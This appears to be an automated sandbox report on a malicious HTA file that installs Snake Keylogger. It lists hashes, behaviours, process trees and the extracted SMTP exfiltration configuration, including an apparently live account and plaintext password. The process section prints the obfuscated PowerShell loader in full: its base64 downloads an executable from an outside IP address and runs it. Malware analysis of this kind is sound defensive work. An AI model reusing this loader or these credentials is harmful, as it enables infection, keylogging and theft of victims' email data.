Analysis
-
max time kernel
122s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
27-09-2024 14:45
Static task
static1
Behavioral task
behavioral1
Sample
17116a0f43508549998ef6618154d77a.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
17116a0f43508549998ef6618154d77a.hta
Resource
win10v2004-20240802-en
General
-
Target
17116a0f43508549998ef6618154d77a.hta
-
Size
115KB
-
MD5
17116a0f43508549998ef6618154d77a
-
SHA1
e71af8b0489263e476521a5fd6e22e5511369c4d
-
SHA256
1c6d98ce8a37adc665452a1ca4bfa1fd5b347de7654578503527e28e90275f64
-
SHA512
a6824f19100e0fd4c996ab8db64875fb1c0c0e4d045792793b45ad1e93cb358c6746289209d8d1f4634c6ebed9ade9e43a5b3407856780e7e60954efc249e9d9
-
SSDEEP
96:Ea+M7wmf6PCZ60NUrnPmeobQk9B6/A6I6L1j+Z668AT:Ea+Qwmf6PCZ6kUTWfz6Y6dKZ6+T
Malware Config
Extracted
snakekeylogger
Protocol: smtp- Host:
mail.teilecar.com - Port:
587 - Username:
[email protected] - Password:
Manta924porsche=911 - Email To:
[email protected]
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 3 IoCs
resource yara_rule behavioral1/memory/1576-29-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/1576-31-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/1576-30-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2736 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
pid Process 2736 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1844 dllhost.exe -
Loads dropped DLL 1 IoCs
pid Process 2736 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0009000000015689-21.dat autoit_exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1844 set thread context of 1576 1844 dllhost.exe 37 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2736 powershell.exe 2736 powershell.exe 2736 powershell.exe 1576 RegSvcs.exe 1576 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1844 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2736 powershell.exe Token: SeDebugPrivilege 1576 RegSvcs.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2984 wrote to memory of 2836 2984 mshta.exe 30 PID 2984 wrote to memory of 2836 2984 mshta.exe 30 PID 2984 wrote to memory of 2836 2984 mshta.exe 30 PID 2984 wrote to memory of 2836 2984 mshta.exe 30 PID 2836 wrote to memory of 2736 2836 cmd.exe 32 PID 2836 wrote to memory of 2736 2836 cmd.exe 32 PID 2836 wrote to memory of 2736 2836 cmd.exe 32 PID 2836 wrote to memory of 2736 2836 cmd.exe 32 PID 2736 wrote to memory of 2832 2736 powershell.exe 33 PID 2736 wrote to memory of 2832 2736 powershell.exe 33 PID 2736 wrote to memory of 2832 2736 powershell.exe 33 PID 2736 wrote to memory of 2832 2736 powershell.exe 33 PID 2832 wrote to memory of 2888 2832 csc.exe 34 PID 2832 wrote to memory of 2888 2832 csc.exe 34 PID 2832 wrote to memory of 2888 2832 csc.exe 34 PID 2832 wrote to memory of 2888 2832 csc.exe 34 PID 2736 wrote to memory of 1844 2736 powershell.exe 36 PID 2736 wrote to memory of 1844 2736 powershell.exe 36 PID 2736 wrote to memory of 1844 2736 powershell.exe 36 PID 2736 wrote to memory of 1844 2736 powershell.exe 36 PID 1844 wrote to memory of 1576 1844 dllhost.exe 37 PID 1844 wrote to memory of 1576 1844 dllhost.exe 37 PID 1844 wrote to memory of 1576 1844 dllhost.exe 37 PID 1844 wrote to memory of 1576 1844 dllhost.exe 37 PID 1844 wrote to memory of 1576 1844 dllhost.exe 37 PID 1844 wrote to memory of 1576 1844 dllhost.exe 37 PID 1844 wrote to memory of 1576 1844 dllhost.exe 37 PID 1844 wrote to memory of 1576 1844 dllhost.exe 37 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\17116a0f43508549998ef6618154d77a.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c POwerSheLl -eX BypASs -nop -W 1 -c DevIceCrEdeNTiAldEplOymENT.Exe ; Iex($(iEX('[sYStem.tEXt.ENcoDINg]'+[char]0x3a+[ChAR]0X3a+'UTf8.GEtStRiNG([SyStem.cOnvErt]'+[char]0x3A+[char]0x3a+'FROMBasE64STRIng('+[CHAr]0X22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVmSW5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmNzY1NJTSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaQ3FpWEIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxvSkRMcGx6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuZEdHIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBya1lBRVF4ekt4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuNi82MDAvZGxsaG9zdC5leGUiLCIkRU52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c1RBclQtU0xlRVAoMyk7U3RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[CHAR]0X22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePOwerSheLl -eX BypASs -nop -W 1 -c DevIceCrEdeNTiAldEplOymENT.Exe ; Iex($(iEX('[sYStem.tEXt.ENcoDINg]'+[char]0x3a+[ChAR]0X3a+'UTf8.GEtStRiNG([SyStem.cOnvErt]'+[char]0x3A+[char]0x3a+'FROMBasE64STRIng('+[CHAr]0X22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVmSW5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmNzY1NJTSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaQ3FpWEIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxvSkRMcGx6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuZEdHIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBya1lBRVF4ekt4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuNi82MDAvZGxsaG9zdC5leGUiLCIkRU52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c1RBclQtU0xlRVAoMyk7U3RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[CHAR]0X22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\12oc928g.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7A30.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7A2F.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2888
-
-
-
C:\Users\Admin\AppData\Roaming\dllhost.exe"C:\Users\Admin\AppData\Roaming\dllhost.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1844 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\dllhost.exe"5⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1576
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5e649788fb73522c9d217ae69e89cce8b
SHA18b6d08947082594de34d6246583afa18d7567569
SHA25632348956479f4b46f39b1c31363a3d50ed2d8a07e0dde17b34932967facb5a84
SHA512fa2eb91d680806dc64eea38b439cc052136c73858780ba0afe03bfc7a0170471311df69ea6f38340793ae4582304eb4526fe0562d8e67f7448c356c6f1ab283c
-
Filesize
7KB
MD5bed7b79e3e0a072f549ca4b3852fb63e
SHA17a915b144a6ede7fc2bf2fbc77334b75a568f1e6
SHA256a991a23d23a5c1bdbd28d8bc4eb73128f7df5627a07dc5c6de4305876fd53ff2
SHA512dc649bd72bfda1650ae72eb6045a9464056cc98ced0dbc4c6eb2a79a47c5715649da368d3426df8d10c82e4583b266a44bf5cc67a9186de05661915b097d23eb
-
Filesize
1KB
MD5170e3c67de5af37e538331d963f4f4cf
SHA10e2f5187ec4c94fa345c98ebd1088bb06d67d341
SHA256549490188fe60100502cf918c0f593eaa9590e1c3cf12ee409b5f6f6aed1b669
SHA512e1dbecab63db159f8ac78bd14aa82113583e1f6f1091fb449bfc8d6ec162bb665f0dc38c49a838ad26fe1ce589c9e46b1ec95c43f3d7387f4b986274ab236a3b
-
Filesize
956KB
MD5249f4ca7f1cc801c87cebd0cdf0b398e
SHA11241f91fa9239ed0553c33f6d3651644813f6f84
SHA256b639e9680b5ac670c7b58863479c1cf9c7bea436aee481fa9729c6a82508e556
SHA5120b6ae1f507b5599f9fb651576e12ae378b66111193623d806f0e6266e8ee93f1fa5dedd4d4b96f3360fecc81962b76e9bacc7c1096a96df5b33fbd64aa6a18d6
-
Filesize
475B
MD574ac079a164eedfd18ee0237dead2da7
SHA162575f712ded8ea2637ee5e5eda8ae9cf2919dc1
SHA2566c72d2a89a0a1d35a067d9322c4c94503d5a75a2e6308cbf9b7bc95e9396f615
SHA5127994aaef91f02e10fd65e782063492a1658e9b1e6e6ffa3a54fce1ab14b39c19bbd3b61cea46908f87cfde0466ef53e3be352c003db797bef0c9f67875285dbb
-
Filesize
309B
MD58b4ba3db91b7a32e8afeb327051a3097
SHA11214eb244f578e99963eee8e9bbce12c4e19d9a6
SHA256ce8f2d2309304ead46eb46ebcb9111a9b260a97a873bc050bc986080c77a9be4
SHA51225bd442ee91d493b5e0cf57d7ab973f32f5bf044651ffc5ed60bfab53fb6e8d9f1e467bb568bc3d3581c0402fb831f36b7bfe3c8778d2d8b008e8d901c2bcfc4
-
Filesize
652B
MD5ee9a738f7fc3f3327f1d0c474bf9ab7b
SHA120aa2b8623b2e1ebc34ac14ce5b4f07820a9cc69
SHA256d6eddbeecb9eab68b1a2669bf29b359a7f8e45e2b58c42c479338ef7b074578f
SHA512f6277561406ca67813352f0dd71055784a76a320722db34c4ab70e4e8d2145749b0b695bbb8ea3ed1919869c90d26ceebf148a26f1f7de7faf747c1a366dd79d